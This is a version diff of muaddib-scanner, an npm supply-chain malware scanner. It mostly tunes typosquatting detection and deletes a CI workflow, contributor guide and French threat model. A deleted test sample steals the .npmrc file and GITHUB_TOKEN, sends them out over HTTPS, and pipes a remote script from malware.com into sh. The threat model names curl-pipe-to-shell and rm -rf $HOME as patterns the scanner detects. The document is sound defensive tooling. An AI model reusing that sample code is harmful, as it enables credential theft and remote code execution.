muaddib-scanner 1.0.9 → 1.0.10

package/src/scanner/typosquat.js

@@ -7,57 +7,46 @@ const POPULAR_PACKAGES = [
   'request', 'async', 'bluebird', 'underscore', 'uuid', 'debug', 'mkdirp',
   'glob', 'minimist', 'webpack', 'babel-core', 'typescript', 'eslint',
   'prettier', 'jest', 'mocha', 'chai', 'sinon', 'mongoose', 'sequelize',
-  'mysql', 'pg', 'redis', 'mongodb', 'socket.io', 'express-session',
+  'mysql', 'redis', 'mongodb', 'socket.io', 'express-session',
   'body-parser', 'cookie-parser', 'cors', 'helmet', 'morgan', 'dotenv',
   'jsonwebtoken', 'bcrypt', 'passport', 'nodemailer', 'aws-sdk', 'stripe',
   'twilio', 'firebase', 'graphql', 'apollo-server', 'next', 'nuxt',
-  'gatsby', 'vue', 'angular', 'svelte', 'electron', 'puppeteer', 'cheerio',
+  'gatsby', 'angular', 'svelte', 'electron', 'puppeteer', 'cheerio',
   'sharp', 'jimp', 'canvas', 'pdf-lib', 'exceljs', 'csv-parser', 'xml2js',
-  'yaml', 'ini', 'config', 'yargs', 'inquirer', 'ora', 'chalk', 'colors',
-  'winston', 'bunyan', 'pino', 'log4js', 'ramda', 'rxjs', 'immutable',
-  'mobx', 'redux', 'zustand', 'formik', 'yup', 'joi', 'ajv', 'validator',
+  'yaml', 'config', 'yargs', 'inquirer', 'ora', 'colors',
+  'winston', 'bunyan', 'pino', 'log4js', 'ramda', 'immutable',
+  'mobx', 'redux', 'zustand', 'formik', 'yup', 'ajv', 'validator',
   'date-fns', 'dayjs', 'luxon', 'numeral', 'accounting', 'currency.js',
   'lodash-es', 'core-js', 'regenerator-runtime', 'tslib', 'classnames',
-  'prop-types', 'cross-env', 'npm', 'yarn', 'pnpm', 'node-fetch', 'got'
+  'prop-types', 'cross-env', 'node-fetch', 'got'
 ];
 
-// Packages legitimes qui ressemblent a des populaires mais sont OK
+// Packages legitimes courts ou qui ressemblent a des populaires
 const WHITELIST = [
-  'acorn',
-  'acorn-walk',
-  'js-yaml',
-  'cross-env',
-  'node-fetch',
-  'node-gyp',
-  'core-js',
-  'lodash-es',
-  'date-fns',
-  'ts-node',
-  'ts-jest',
-  'css-loader',
-  'style-loader',
-  'file-loader',
-  'url-loader',
-  'babel-loader',
-  'vue-loader',
-  'react-dom',
-  'react-router',
-  'react-redux',
-  'vue-router',
-  'express-session',
-  'body-parser',
-  'cookie-parser'
+  // Packages tres courts legitimes
+  'qs', 'pg', 'ms', 'ws', 'ip', 'on', 'is', 'it', 'to', 'or', 'fs', 'os',
+  'co', 'q', 'n', 'i', 'a', 'v', 'x', 'y', 'z',
+  'ejs', 'nyc', 'ini', 'joi', 'vue', 'npm', 'got', 'ora',
+  'vary', 'mime', 'send', 'etag', 'raw', 'tar', 'uid', 'cjs',
+  'rxjs', 'yarn', 'pnpm',
+  
+  // Packages legitimes avec noms similaires
+  'acorn', 'acorn-walk', 'js-yaml', 'cross-env', 'node-fetch', 'node-gyp',
+  'core-js', 'lodash-es', 'date-fns', 'ts-node', 'ts-jest',
+  'css-loader', 'style-loader', 'file-loader', 'url-loader', 'babel-loader',
+  'vue-loader', 'react-dom', 'react-router', 'react-redux', 'vue-router',
+  'express-session', 'body-parser', 'cookie-parser',
+  
+  // Packages Express.js communs
+  'accepts', 'array-flatten', 'content-disposition', 'content-type',
+  'depd', 'destroy', 'encodeurl', 'escape-html', 'fresh', 'merge-descriptors',
+  'methods', 'on-finished', 'parseurl', 'path-to-regexp', 'proxy-addr',
+  'range-parser', 'safe-buffer', 'safer-buffer', 'setprototypeof',
+  'statuses', 'type-is', 'unpipe', 'utils-merge'
 ];
 
-// Techniques de typosquatting connues
-const TYPOSQUAT_PATTERNS = [
-  { type: 'missing_char', fn: (name) => generateMissingChar(name) },
-  { type: 'extra_char', fn: (name) => generateExtraChar(name) },
-  { type: 'swapped_chars', fn: (name) => generateSwappedChars(name) },
-  { type: 'wrong_char', fn: (name) => generateWrongChar(name) },
-  { type: 'hyphen_tricks', fn: (name) => generateHyphenTricks(name) },
-  { type: 'suffix_tricks', fn: (name) => generateSuffixTricks(name) }
-];
+// Seuil minimum de longueur pour eviter faux positifs
+const MIN_PACKAGE_LENGTH = 4;
 
 async function scanTyposquatting(targetPath) {
   const threats = [];
@@ -98,18 +87,24 @@ async function scanTyposquatting(targetPath) {
 
 function findTyposquatMatch(name) {
   // Ignore les packages whitelistes
-  if (WHITELIST.includes(name)) return null;
+  if (WHITELIST.includes(name.toLowerCase())) return null;
   
   // Ignore les packages scoped (@org/package)
   if (name.startsWith('@')) return null;
 
+  // Ignore les packages tres courts (trop de faux positifs)
+  if (name.length < MIN_PACKAGE_LENGTH) return null;
+
   for (const popular of POPULAR_PACKAGES) {
     // Ignore si c'est exactement le meme
-    if (name === popular) continue;
+    if (name.toLowerCase() === popular.toLowerCase()) continue;
 
-    const distance = levenshteinDistance(name, popular);
+    // Ignore si le package populaire est trop court
+    if (popular.length < MIN_PACKAGE_LENGTH) continue;
+
+    const distance = levenshteinDistance(name.toLowerCase(), popular.toLowerCase());
     
-    // Distance de 1 ou 2 = tres suspect
+    // Distance de 1 = tres suspect (une seule lettre de difference)
     if (distance === 1) {
       return {
         original: popular,
@@ -118,8 +113,8 @@ function findTyposquatMatch(name) {
       };
     }
 
-    // Distance de 2 avec nom court = suspect
-    if (distance === 2 && popular.length <= 6) {
+    // Distance de 2 seulement si le package est assez long (>= 8 chars)
+    if (distance === 2 && popular.length >= 8) {
       return {
         original: popular,
         type: detectTyposquatType(name, popular),
@@ -156,16 +151,21 @@ function detectTyposquatType(typo, original) {
 }
 
 function isSuffixTrick(name, popular) {
+  const nameLower = name.toLowerCase();
+  const popularLower = popular.toLowerCase();
+  
   const suffixes = ['-js', '.js', '-node', '-npm', '-cli', '-api', '-lib', '-pkg', '-dev', '-pro'];
   for (const suffix of suffixes) {
-    if (name === popular + suffix) return true;
-    if (name === popular.replace('-', '') + suffix) return true;
+    if (nameLower === popularLower + suffix) return true;
+    if (nameLower === popularLower.replace('-', '') + suffix) return true;
   }
+  
   // Verifie aussi les prefixes
   const prefixes = ['node-', 'npm-', 'js-', 'get-', 'the-'];
   for (const prefix of prefixes) {
-    if (name === prefix + popular) return true;
+    if (nameLower === prefix + popularLower) return true;
   }
+  
   return false;
 }
 
@@ -186,9 +186,9 @@ function levenshteinDistance(a, b) {
         matrix[i][j] = matrix[i - 1][j - 1];
       } else {
         matrix[i][j] = Math.min(
-          matrix[i - 1][j - 1] + 1, // substitution
-          matrix[i][j - 1] + 1,     // insertion
-          matrix[i - 1][j] + 1      // deletion
+          matrix[i - 1][j - 1] + 1,
+          matrix[i][j - 1] + 1,
+          matrix[i - 1][j] + 1
         );
       }
     }
@@ -197,70 +197,4 @@ function levenshteinDistance(a, b) {
   return matrix[b.length][a.length];
 }
 
-// Generateurs pour tests (pas utilises dans le scan, mais utiles pour enrichir les IOCs)
-function generateMissingChar(name) {
-  const results = [];
-  for (let i = 0; i < name.length; i++) {
-    results.push(name.slice(0, i) + name.slice(i + 1));
-  }
-  return results;
-}
-
-function generateExtraChar(name) {
-  const results = [];
-  const chars = 'abcdefghijklmnopqrstuvwxyz0123456789-';
-  for (let i = 0; i <= name.length; i++) {
-    for (const char of chars) {
-      results.push(name.slice(0, i) + char + name.slice(i));
-    }
-  }
-  return results;
-}
-
-function generateSwappedChars(name) {
-  const results = [];
-  for (let i = 0; i < name.length - 1; i++) {
-    const arr = name.split('');
-    [arr[i], arr[i + 1]] = [arr[i + 1], arr[i]];
-    results.push(arr.join(''));
-  }
-  return results;
-}
-
-function generateWrongChar(name) {
-  const results = [];
-  const keyboard = {
-    'a': 'sqwz', 'b': 'vghn', 'c': 'xdfv', 'd': 'serfcx', 'e': 'wsdfr',
-    'f': 'drtgvc', 'g': 'ftyhbv', 'h': 'gyujnb', 'i': 'ujklo', 'j': 'huikmn',
-    'k': 'jiolm', 'l': 'kop', 'm': 'njk', 'n': 'bhjm', 'o': 'iklp',
-    'p': 'ol', 'q': 'wa', 'r': 'edft', 's': 'awedxz', 't': 'rfgy',
-    'u': 'yhji', 'v': 'cfgb', 'w': 'qase', 'x': 'zsdc', 'y': 'tghu', 'z': 'asx'
-  };
-  for (let i = 0; i < name.length; i++) {
-    const char = name[i].toLowerCase();
-    if (keyboard[char]) {
-      for (const replacement of keyboard[char]) {
-        results.push(name.slice(0, i) + replacement + name.slice(i + 1));
-      }
-    }
-  }
-  return results;
-}
-
-function generateHyphenTricks(name) {
-  const results = [];
-  // Ajouter des hyphens
-  for (let i = 1; i < name.length; i++) {
-    results.push(name.slice(0, i) + '-' + name.slice(i));
-  }
-  // Retirer des hyphens
-  results.push(name.replace(/-/g, ''));
-  return results;
-}
-
-function generateSuffixTricks(name) {
-  const suffixes = ['-js', '.js', '-node', '-npm', '-cli'];
-  return suffixes.map(s => name + s);
-}
-
 module.exports = { scanTyposquatting, levenshteinDistance };

package/.github/workflows/scan.yml

@@ -1,33 +0,0 @@
-name: MUADDIB Security Scan
-
-on:
-  push:
-    branches: [master, main]
-  pull_request:
-    branches: [master, main]
-
-jobs:
-  scan:
-    runs-on: ubuntu-latest
-    permissions:
-      security-events: write
-      contents: read
-    steps:
-      - name: Checkout code
-        uses: actions/checkout@v4
-
-      - name: Setup Node.js
-        uses: actions/setup-node@v4
-        with:
-          node-version: '20'
-
-      - name: Install dependencies
-        run: npm install
-
-      - name: Run MUADDIB scan
-        run: node bin/muaddib.js scan . --sarif results.sarif || true
-
-      - name: Upload SARIF to GitHub Security
-        uses: github/codeql-action/upload-sarif@v3
-        with:
-          sarif_file: results.sarif

package/CONTRIBUTING.md

@@ -1,98 +0,0 @@
-# Contributing to MUAD'DIB
-
-Thanks for your interest in improving MUAD'DIB!
-
-## Ways to contribute
-
-### 1. Add new IOCs (Indicators of Compromise)
-
-Edit `iocs/packages.yaml` and add:
-```yaml
-- id: MALWARE-XXX-001
-  name: "malicious-package-name"
-  version: "*"
-  severity: critical
-  confidence: high
-  source: your-name
-  description: "Short description of the threat"
-  references:
-    - https://link-to-blog-or-advisory
-  mitre: T1195.002
-```
-
-**Severity levels:** critical, high, medium, low
-
-**MITRE techniques:**
-- T1195.002 — Supply chain compromise
-- T1552.001 — Credentials in files
-- T1059 — Command execution
-- T1027 — Obfuscation
-- T1041 — Exfiltration
-
-### 2. Add detection rules
-
-Edit `src/rules/index.js` and add a new rule:
-```javascript
-my_new_rule: {
-  id: 'MUADDIB-XXX-001',
-  name: 'My New Detection',
-  severity: 'HIGH',
-  confidence: 'high',
-  description: 'What this rule detects',
-  references: ['https://...'],
-  mitre: 'T1195.002'
-}
-```
-
-### 3. Add response playbooks
-
-Edit `src/response/playbooks.js` and add:
-```javascript
-case 'my_new_rule':
-  return 'Step-by-step response instructions';
-```
-
-### 4. Report false positives
-
-Open an issue with:
-- Package name
-- Detection rule triggered
-- Why it's a false positive
-
-### 5. Report missed detections
-
-Open an issue with:
-- Malicious package name
-- What it does
-- Links to advisories
-
-## Development
-```bash
-git clone https://github.com/DNSZLSK/muad-dib.git
-cd muad-dib
-npm install
-npm test
-```
-
-## Testing your changes
-```bash
-node bin/muaddib.js scan tests/samples --explain
-```
-
-## Pull request process
-
-1. Fork the repo
-2. Create a branch (`git checkout -b feature/my-feature`)
-3. Make your changes
-4. Run tests (`npm test`)
-5. Commit (`git commit -m "Add my feature"`)
-6. Push (`git push origin feature/my-feature`)
-7. Open a Pull Request
-
-## Code of conduct
-
-Be respectful. We're all here to make npm safer.
-
-## Questions?
-
-Open an issue or join our Discord: https://discord.gg/y8zxSmue

package/docs/threat-model.md

@@ -1,116 +0,0 @@
-# MUAD'DIB Threat Model
-
-## Ce que MUAD'DIB detecte
-
-### Attaques Supply Chain npm
-
-| Technique | Detection | Confidence |
-|-----------|-----------|------------|
-| Packages malveillants connus | Hash SHA256 + nom | HIGH |
-| Shai-Hulud v1/v2/v3 | Marqueurs + fichiers + comportements | HIGH |
-| event-stream (2018) | Nom + version | HIGH |
-| Typosquatting | Liste de packages connus | MEDIUM |
-| Protestware (node-ipc, colors) | Nom + version | HIGH |
-
-### Comportements malveillants
-
-| Technique | Detection | Confidence |
-|-----------|-----------|------------|
-| Vol de credentials (.npmrc, .ssh) | Analyse AST | HIGH |
-| Exfiltration via env vars (GITHUB_TOKEN) | Analyse AST | HIGH |
-| Execution de code distant (curl \| sh) | Pattern matching | HIGH |
-| Reverse shell | Pattern matching | HIGH |
-| Dead man's switch (rm -rf $HOME) | Pattern matching | HIGH |
-| Code obfusque | Heuristiques | MEDIUM |
-
-### Flux de donnees suspects
-
-| Technique | Detection | Confidence |
-|-----------|-----------|------------|
-| Lecture credential + envoi reseau | Analyse dataflow | HIGH |
-| Acces process.env + fetch/request | Analyse dataflow | HIGH |
-
-## Ce que MUAD'DIB NE detecte PAS
-
-### Limitations connues
-
-| Technique | Raison |
-|-----------|--------|
-| Malware polymorphe | Pas d'analyse dynamique |
-| Obfuscation avancee | Heuristiques limitees |
-| Zero-day (packages inconnus) | Base IOC reactive |
-| Attaques via binaires natifs | Pas d'analyse binaire |
-| Backdoors subtiles | Pas de review de code semantique |
-| Time bombs (declenchement differe) | Pas d'analyse temporelle |
-
-### Faux negatifs potentiels
-
-- Code malveillant dans des fichiers non-JS (WASM, binaires)
-- Exfiltration via DNS ou autres canaux couverts
-- Malware qui detecte l'environnement d'analyse
-- Attaques multi-etapes avec payload distant
-
-## Hypotheses
-
-1. **Le code source est disponible** — MUAD'DIB analyse le code, pas les binaires
-2. **Les IOCs sont a jour** — La detection depend de la base IOC
-3. **L'attaquant utilise des techniques connues** — Zero-days passent a travers
-4. **Le scan est execute avant l'installation** — Apres `npm install`, c'est trop tard si preinstall a execute
-
-## Architecture de detection
-```
-┌─────────────────────────────────────────────────────────────┐
-│                      MUAD'DIB Scanner                        │
-├─────────────────────────────────────────────────────────────┤
-│  ┌─────────────┐  ┌─────────────┐  ┌─────────────────────┐  │
-│  │  IOC Match  │  │  AST Parse  │  │  Pattern Matching   │  │
-│  │  (hashes,   │  │  (acorn)    │  │  (shell, scripts)   │  │
-│  │  packages)  │  │             │  │                     │  │
-│  └──────┬──────┘  └──────┬──────┘  └──────────┬──────────┘  │
-│         │                │                     │             │
-│         v                v                     v             │
-│  ┌─────────────────────────────────────────────────────────┐│
-│  │                   Dataflow Analysis                      ││
-│  │            (credential read -> network send)             ││
-│  └─────────────────────────────────────────────────────────┘│
-│         │                │                     │             │
-│         v                v                     v             │
-│  ┌─────────────────────────────────────────────────────────┐│
-│  │                   Threat Enrichment                      ││
-│  │         (rules, MITRE ATT&CK, playbooks)                 ││
-│  └─────────────────────────────────────────────────────────┘│
-└─────────────────────────────────────────────────────────────┘
-```
-
-## Mapping MITRE ATT&CK
-
-| Technique | ID | Detection MUAD'DIB |
-|-----------|----|--------------------|
-| Credentials in Files | T1552.001 | AST analysis |
-| Command and Scripting Interpreter | T1059 | Pattern matching |
-| Supply Chain Compromise | T1195.002 | IOC matching |
-| Obfuscated Files | T1027 | Heuristics |
-| Exfiltration Over C2 Channel | T1041 | Dataflow analysis |
-| Data Destruction | T1485 | Pattern matching |
-| Ingress Tool Transfer | T1105 | Pattern matching |
-
-## Recommandations
-
-### Pour les utilisateurs
-
-1. Executer `muaddib scan .` AVANT `npm install`
-2. Mettre a jour les IOCs regulierement (`muaddib update`)
-3. Utiliser le mode `--explain` pour comprendre les detections
-4. Integrer dans CI/CD avec sortie SARIF
-
-### Pour les equipes securite
-
-1. Completer avec une analyse dynamique (sandbox)
-2. Monitorer les nouveaux packages avant adoption
-3. Utiliser `--sarif` pour integration SIEM
-4. Contribuer des IOCs via PR sur le repo
-
-## Contacts
-
-- Repository: https://github.com/DNSZLSK/muad-dib
-- Issues: https://github.com/DNSZLSK/muad-dib/issues

package/test/samples/malicious.js

@@ -1,20 +0,0 @@
-// Exemple de code malveillant style Shai-Hulud
-const fs = require('fs');
-const https = require('https');
-const { exec } = require('child_process');
-
-// Vol de credentials
-const npmrc = fs.readFileSync(process.env.HOME + '/.npmrc', 'utf8');
-const token = process.env.GITHUB_TOKEN;
-
-// Exfiltration
-const data = JSON.stringify({ npmrc, token });
-const req = https.request('https://api.github.com/repos', {
-  method: 'POST',
-  headers: { 'Content-Type': 'application/json' }
-});
-req.write(data);
-req.end();
-
-// Execution de commande
-exec('curl https://malware.com/payload.sh | sh');